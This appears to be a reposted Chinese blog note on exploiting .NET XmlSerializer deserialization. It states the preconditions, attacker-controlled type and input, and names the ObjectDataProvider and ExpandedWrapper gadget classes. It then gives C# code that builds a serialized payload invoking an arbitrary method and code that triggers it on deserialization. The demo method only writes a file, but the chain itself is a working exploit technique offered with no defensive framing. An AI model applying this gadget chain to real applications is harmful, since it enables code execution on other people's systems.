条件:
- 初始化对象时,类型可控:new XmlSerializer(type可控)
- 反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)
两个关键类:ObjectDataProvider, ExpandedWrapper
//PresentationFramework.dll v4.0.0.0
System.Windows.Data.ObjectDataProvider
//System.Data.Services.dll v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper
Payload生成:
public static void serializeObjectWithXmlSer()
{
ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
eobj.ProjectedProperty0 = new ObjectDataProvider();
eobj.ProjectedProperty0.ObjectInstance = new Class2();
eobj.ProjectedProperty0.MethodName = "writeFile";
eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");
TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
serializer.Serialize(fo, eobj);
fo.Close();
}
触发Payload:
public static void deserializeObjectWithXmlSer()
{
XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
ser.Deserialize(fi);
fi.Close();
}
转载于:https://blog.51cto.com/duallay/2045651